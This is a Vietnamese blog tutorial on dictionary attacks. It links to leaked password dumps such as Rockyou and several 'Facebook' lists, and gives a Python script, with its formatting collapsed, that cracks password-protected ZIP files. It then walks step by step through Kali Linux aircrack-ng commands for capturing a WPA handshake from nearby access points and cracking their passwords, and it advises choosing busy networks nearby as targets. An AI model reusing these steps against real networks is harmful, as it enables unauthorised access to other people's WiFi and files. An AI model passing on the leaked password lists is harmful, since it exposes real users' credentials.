Cơ bản về Dictionary Attack và cách dùng
Phần 1 : File Dictionary
- Join the ripper : http://adf.ly/1WGP1y
- Cain & Aben: http://adf.ly/1WGP1y
- Conficker worm : http://adf.ly/1WGP1y
- 370 Banned Twitter passwords : http://adf.ly/1WGP1y
- Rockyou : http://adf.ly/1WGP1y
- phpBB : http://adf.ly/1WGP1y
- Big pass : http://adf.ly/1WGP1y ( File có dung lượng hơn 4GB)
- Facebook L,1: http://adf.ly/1WGP1y
- Facebook L.2: http://adf.ly/1WGP1y
- Facebook L.3: http://adf.ly/1WGP1y
- Facebook L.4: http://adf.ly/1WGP1y
- VietNam : http://adf.ly/1WGP1y
Phần 2: Hướng dẫn
Dùng Python 
Ad sẽ hướng dẫn để bẻ khóa file ZIP với python dùng phương pháp Dictionary Attack nhé
Chúng ta sẽ cần
- Sử dụng một số hàm cơ bản trong thư viện zipfile của python
- Cách sử dụng Thread đơn giản trong python.
Ý tưởng chính ( và rất đơn giản :D) của script này như sau: - Tạo 1 file zip được bảo vệ bởi mật khẩu.
- Có file dictionary.txt chứa các chuỗi ký tự có thể là mật khẩu, mỗi chuỗi ký tự nằm trên một dòng.
- Lần lượt sử dụng dữ liệu trong file dictionary.txt để giải nén dùng hàm extractall(), nếu đúng thì in ra màn hình mật khẩu tìm được.
Thực hiện: - Tạo file 1.zip có mật khẩu anonymousvn
Mã (text):
root@agent1 [~/py]# zip -P anonymousvn 1.zip 1.txt 2.txt
root@agent1 [~/py]# ll
total 92K
drwxr-xr-x 2 root root 4.0K May 6 21:00 ./
drwxr-x--- 16 root root 4.0K May 6 20:58 ../
-rw-r--r-- 1 root root 318 May 6 21:00 1.zip| root@agent1 [~/py]# cat dictionary.txt abc abc@ abc@123 21345 123123 abcdef hacker python vietnam cham info abc@0510 anonymousvn |
File dictionary.txt
Và quan trọng nhất là :
- Đoạn script dò mật khẩu
Mã (Python)
| #!/usr/local/bin/python2.7 import zipfiledef extractFile(zFile,password): try: zFile.extractall(pwd=password) print ‘[+] Found password ‘+password +’n’ except: passdef main(): zFile = zipfile.ZipFile(‘1.zip’) passFile = open(‘dictionary.txt’) for line in passFile.readlines(): password = line.strip(‘n’) guess = extractFile(zFile,password) if guess: print ‘[+] Password = ‘ + password + ‘n’ exit(0)if __name__ == ‘__main__’: main() |
- Đối với mật khẩu dài, file dictionary.txt nhiều dữ liệu nên script cần chạy nhiều lần mới có thể dò ra vì mỗi lần chỉ thử 1 dòng. Để tăng tốc độ ta sử dụng thư viên Thread trong python, nó sẽ tạo các threads cho phép thử cùng lúc làm nhiều tác vụ hơn ( threads là gì thì chắc mọi người cũng nắm hết rồi). Đoạn code sẽ trở thành như sau:
| #!/usr/local/bin/python2.7 import zipfile from threading import Threaddef extractFile(zFile,password): try: zFile.extractall(pwd=password) print ‘[+] Found password ‘+password +’n’ except: passdef main(): zFile = zipfile.ZipFile(‘1.zip’) passFile = open(‘dictionary.txt’) for line in passFile.readlines(): password = line.strip(‘n’) t = Thread(target=extractFile, args=(zFile,password)) t.start()if __name__ == ‘__main__’: main() |
Bây giờ chạy nó và đợi mật khẩu thôi nào
- Aha, mật khẩu đã được đưa ra
- root@agent1 [~/py]# ./zip.py
[+] Found password anonymousvn
Dùng Kali Linux
Các Bước Làm :
-Dùng Kali Linux để sử dụng
-Hoặc dùng live usb để boot vào Kali cũng được
B1 : Đầu tiên ,bạn vào terminal gõ lệnh “iwconfig” để xác định card wifi của bạn ,ở đây là wlan0
B2 : khởi động Gõ lệnh “airmon-ng start wlan0” để chạy tính năng monitor trên wlan0 .
B3: Gõ lệnh “airodump-ng mon0” để xem các AP (thiết bị wifi) đang hoạt động gần bạn và thông số của chúng .
Ta thu các thông số có nghĩa như sau :
BSSID : MAC Address của AP
PWR : Cường độ tín hiệu .
Beacons : Số frame tín hiệu nhận được ,cường độ tín hiệu càng mạnh thì số frame của bạn sẽ có tốc độ tăng nhanh.
Data : gói dữ liệu bạn nhận được .
CH : các kênh AP đang hoạt động ,kênh AP nào càng gần bạn thì có chỉ số càng cao .
MB : tốc độ wifi của các chuẩn a/b/g/n …
ENC : loại mã hóa WEP ,WPA hoặc WPA2
ESSID : tên mạng wifi.
Ở đây để có thể có tỉ lệ thành công ,các bạn cần có vị trị gần AP càng tốt ,các bạn nên chọn AP có chỉ số CH cao, tốc độ Data nhận được cao tức là trong AP này chắc chắn đang có Station hoạt động .
Sau khi các bạn xác định được mục tiêu ,các bạn sẽ lấy thông BSSID, CH của mục tiêu .
B4: Các bạn mở thêm 1 Terminal và gõ lệnh sau :
“airodump-ng mon0 –bssid “thông số BSSID của mục tiêu” –channel “thông số CH của mục tiêu” -w mon”.
giá trị “-w mon” có nghĩa là các gói tin sẽ được lưu trong file mon-01.cap .
giá trị “-w mon” có nghĩa là các gói tin sẽ được lưu trong file mon-01.cap .
Ví dụ khi mình gõ lệnh trên lần đầu thì nó sẽ là ra file mon-01.cap ,nhưng khi mình dừng chạy lệnh và gõ lại 1 lần nữa thì nó sẽ là mon-02.cap .
Quá trình bắt gói và ghi vào file mon-01.cap
B5 :Lúc này khi người sử dụng dùng thiết bị kết nối vào AP (wifi) mục tiêu , và duyệt 1 trang web trên nó hay vào mạng internet.
Lúc này trên máy kali linux sẽ xuất hiện dòng “WPA handshake :”
chỉ khi xuất hiện dòng này ta mới có thể bắt gói tin và bắt đầu dò pass .
B6 : Mở thêm 1 bản Terminal nữa và gõ lệnh sau
“aircrack-ng mon-01.cap –w rockyou.txt” ,
( Link file ở đầu bài nhé )
Sau đó các bạn copy nó vào /root để tiện cho việc thực hiện .
Quá trình dò mật khẩu bắt đầu ,thời gian dò được mật khẩu có độ thành công hay không là tùy vào thư viện Password ,và thời gian có thể mất khá lâu .
Chúc các bạn thành công
DEMO khi ad chạy với HM và EGB ^^
Nguồn : AnonyVN
Cơ bản về Dictionary Attack và cách dùng
Reviewed by myblog
on
09:03:00
Rating:
Không có nhận xét nào: